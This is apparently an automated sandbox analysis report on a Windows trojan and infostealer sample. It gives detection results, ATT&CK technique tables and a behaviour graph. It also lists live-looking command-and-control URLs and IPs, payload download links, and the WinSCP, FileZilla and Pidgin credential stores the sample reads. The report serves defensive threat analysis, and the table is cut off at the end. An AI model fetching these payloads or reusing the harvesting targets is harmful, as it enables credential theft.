                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.788503094.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403831524.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\9545.exe, type: DROPPED
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts1
                              Exploitation for Client Execution
                              1
                              DLL Side-Loading
                              1
                              Exploitation for Privilege Escalation
                              1
                              Deobfuscate/Decode Files or Information
                              1
                              OS Credential Dumping
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              Exfiltration Over Other Network Medium14
                              Ingress Tool Transfer
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default Accounts1
                              Scheduled Task/Job
                              1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              2
                              Obfuscated Files or Information
                              1
                              Input Capture
                              1
                              Account Discovery
                              Remote Desktop Protocol1
                              Data from Local System
                              Exfiltration Over Bluetooth11
                              Encrypted Channel
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain AccountsAt (Linux)1
                              Registry Run Keys / Startup Folder
                              612
                              Process Injection
                              11
                              Software Packing
                              2
                              Credentials in Registry
                              2
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              Automated Exfiltration4
                              Non-Application Layer Protocol
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)1
                              Services File Permissions Weakness
                              1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              1
                              Credentials In Files
                              35
                              System Information Discovery
                              Distributed Component Object Model1
                              Email Collection
                              Scheduled Transfer125
                              Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon Script1
                              Registry Run Keys / Startup Folder
                              1
                              File Deletion
                              LSA Secrets231
                              Security Software Discovery
                              SSH1
                              Input Capture
                              Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.common1
                              Services File Permissions Weakness
                              11
                              Masquerading
                              Cached Domain Credentials2
                              Process Discovery
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                              Virtualization/Sandbox Evasion
                              DCSync31
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job612
                              Process Injection
                              Proc Filesystem1
                              Application Window Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Hidden Files and Directories
                              /etc/passwd and /etc/shadow1
                              System Owner/User Discovery
                              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                              Services File Permissions Weakness
                              Network Sniffing1
                              Remote System Discovery
                              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Rundll32
                              Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 766457 Sample: kmxId0uLRn.exe Startdate: 13/12/2022 Architecture: WINDOWS Score: 100 87 Snort IDS alert for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for URL or domain 2->91 93 9 other signatures 2->93 10 kmxId0uLRn.exe 2->10         started        13 thgcici 2->13         started        15 thgcici 2->15         started        17 2 other processes 2->17 process3 signatures4 119 Detected unpacking (changes PE section rights) 10->119 121 Maps a DLL or memory area into another process 10->121 123 Checks if the current machine is a virtual machine (disk enumeration) 10->123 19 explorer.exe 7 10->19 injected 125 Multi AV Scanner detection for dropped file 13->125 127 Machine Learning detection for dropped file 13->127 129 Creates a thread in another existing process (thread injection) 13->129 process5 dnsIp6 79 kikangalaassociates.com 185.98.131.207, 443, 49723 RMI-FITECHFR France 19->79 81 r3oidsofsios.com 185.246.221.151, 49699, 49700, 49701 LVLT-10753US Germany 19->81 83 31.41.244.228, 49726, 80 AEROEXPRESS-ASRU Russian Federation 19->83 65 C:\Users\user\AppData\Roaming\thgcici, PE32 19->65 dropped 67 C:\Users\user\AppData\Local\Temp\9545.exe, PE32 19->67 dropped 69 C:\Users\user\AppData\Local\Temp\8F68.exe, PE32 19->69 dropped 71 C:\Users\user\...\thgcici:Zone.Identifier, ASCII 19->71 dropped 103 System process connects to network (likely due to code injection or exploit) 19->103 105 Benign windows process drops PE files 19->105 107 Injects code into the Windows Explorer (explorer.exe) 19->107 109 3 other signatures 19->109 24 9545.exe 3 19->24         started        28 8F68.exe 1 19->28         started        30 explorer.exe 19->30         started        32 8 other processes 19->32 file7 signatures8 process9 file10 73 C:\Users\user\AppData\Local\...\gntuud.exe, PE32 24->73 dropped 111 Antivirus detection for dropped file 24->111 113 Multi AV Scanner detection for dropped file 24->113 115 Machine Learning detection for dropped file 24->115 117 Contains functionality to inject code into remote processes 24->117 34 gntuud.exe 18 24->34         started        39 WerFault.exe 4 10 28->39         started        41 conhost.exe 28->41         started        signatures11 process12 dnsIp13 75 62.204.41.79, 49735, 49736, 49738 TNNET-ASTNNetOyMainnetworkFI United Kingdom 34->75 61 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 34->61 dropped 63 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 34->63 dropped 95 Antivirus detection for dropped file 34->95 97 Multi AV Scanner detection for dropped file 34->97 99 Creates an undocumented autostart registry key 34->99 101 2 other signatures 34->101 43 rundll32.exe 34->43         started        47 cmd.exe 1 34->47         started        49 schtasks.exe 1 34->49         started        77 192.168.2.1 unknown unknown 39->77 file14 signatures15 process16 dnsIp17 85 192.168.2.3, 443, 49683, 49689 unknown unknown 43->85 131 System process connects to network (likely due to code injection or exploit) 43->131 133 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 43->133 135 Tries to steal Instant Messenger accounts or passwords 43->135 137 2 other signatures 43->137 51 conhost.exe 47->51         started        53 cmd.exe 47->53         started        55 cacls.exe 47->55         started        59 4 other processes 47->59 57 conhost.exe 49->57         started        signatures18 process19

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              kmxId0uLRn.exe69%ReversingLabsWin32.Trojan.Raccoon
                              kmxId0uLRn.exe60%VirustotalBrowse
                              kmxId0uLRn.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll100%AviraHEUR/AGEN.1233121
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe100%AviraHEUR/AGEN.1253146
                              C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll100%AviraHEUR/AGEN.1233121
                              C:\Users\user\AppData\Local\Temp\9545.exe100%AviraHEUR/AGEN.1253146
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\8F68.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\9545.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\thgcici100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll79%ReversingLabsWin32.Infostealer.Decred
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe53%ReversingLabsWin32.Trojan.Lazy
                              C:\Users\user\AppData\Local\Temp\9545.exe53%ReversingLabsWin32.Trojan.Lazy
                              C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll79%ReversingLabsWin32.Infostealer.Decred
                              C:\Users\user\AppData\Roaming\thgcici69%ReversingLabsWin32.Trojan.Raccoon
                              SourceDetectionScannerLabelLinkDownload
                              43.2.thgcici.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              11.3.thgcici.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.0.9545.exe.dd0000.3.unpack100%AviraHEUR/AGEN.1253146Download File
                              44.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              29.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.0.8F68.exe.c42a60.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                              14.0.9545.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              11.2.thgcici.6a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.0.9545.exe.dd0000.2.unpack100%AviraHEUR/AGEN.1253146Download File
                              44.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.2.8F68.exe.c42a60.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.2.9545.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.0.8F68.exe.c42a60.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                              21.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              14.0.9545.exe.dd0000.1.unpack100%AviraHEUR/AGEN.1253146Download File
                              21.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              0.3.kmxId0uLRn.exe.5e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              11.2.thgcici.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              0.2.kmxId0uLRn.exe.5d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              43.3.thgcici.490000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              43.2.thgcici.470e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              29.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              0.2.kmxId0uLRn.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              SourceDetectionScannerLabelLink
                              r3oidsofsios.com3%VirustotalBrowse
                              kikangalaassociates.com0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              62.204.41.79/fb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1t&0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=10%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1l&0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/Plugins/cred64.dll100%Avira URL Cloudmalware
                              http://62.204.41.79/fb73jc3/index.phpa0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpg0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1T)0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpM0%Avira URL Cloudsafe
                              http://62.204.41.79/fb0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpcu0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIK0%Avira URL Cloudsafe
                              http://62.204.41.79/fbfb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpwu$0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpqu.0%Avira URL Cloudsafe
                              https://kikangalaassociates.com/vidar2.exe0%Avira URL Cloudsafe
                              http://s2scomm20.com/100%Avira URL Cloudmalware
                              http://c2csosi228d.com/100%Avira URL Cloudmalware
                              http://31.41.244.228/fusa/bibar.exe100%Avira URL Cloudmalware
                              http://95.217.27.105:800%Avira URL Cloudsafe
                              http://xdd42sdfsdf.com/100%Avira URL Cloudmalware
                              http://r3oidsofsios.com/Mozilla/5.00%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpF0%Avira URL Cloudsafe
                              http://r3oidsofsios.com/0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              r3oidsofsios.com
                              185.246.221.151
                              truetrueunknown
                              kikangalaassociates.com
                              185.98.131.207
                              truetrueunknown
                              NameMaliciousAntivirus DetectionReputation
                              https://steamcommunity.com/profiles/76561199443972360false
                                high
                                62.204.41.79/fb73jc3/index.phptrue
                                • Avira URL Cloud: safe
                                low
                                http://62.204.41.79/fb73jc3/index.php?scr=1true
                                • Avira URL Cloud: safe
                                unknown
                                https://kikangalaassociates.com/vidar2.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                http://62.204.41.79/fb73jc3/Plugins/cred64.dlltrue
                                • Avira URL Cloud: malware
                                unknown
                                http://31.41.244.228/fusa/bibar.exetrue
                                • Avira URL Cloud: malware
                                unknown
                                http://c2csosi228d.com/true
                                • Avira URL Cloud: malware
                                unknown
                                http://s2scomm20.com/true
                                • Avira URL Cloud: malware
                                unknown
                                http://62.204.41.79/fb73jc3/index.phptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://t.me/ttruelivefalse
                                  high
                                  http://xdd42sdfsdf.com/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://r3oidsofsios.com/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://62.204.41.79/fb73jc3/index.php?scr=1t&gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.google.com/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://62.204.41.79/fb73jc3/index.php?scr=1l&gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://go.mail.ru/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://62.204.41.79/fb73jc3/index.phpagntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://nova.rambler.ru/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        http://62.204.41.79/fbgntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://62.204.41.79/fb73jc3/index.phpggntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://t.me/ttruelivehttps://steamcommunity.com/profiles/76561199443972360http://95.217.27.105:80hi8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpfalse
                                          high
                                          http://search.yahoo.com/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                            high
                                            http://62.204.41.79/fb73jc3/index.php?scr=1T)gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://62.204.41.79/fb73jc3/index.phpcugntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://search.aol.com/aol/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                              high
                                              http://62.204.41.79/fb73jc3/index.phpMgntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fbfb73jc3/index.phpgntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIKgntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpqu.gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpwu$gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://r3oidsofsios.com/Mozilla/5.0explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://95.217.27.105:808F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpFgntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              31.41.244.228
                                              unknownRussian Federation
                                              61974AEROEXPRESS-ASRUtrue
                                              185.246.221.151
                                              r3oidsofsios.comGermany
                                              10753LVLT-10753UStrue
                                              62.204.41.79
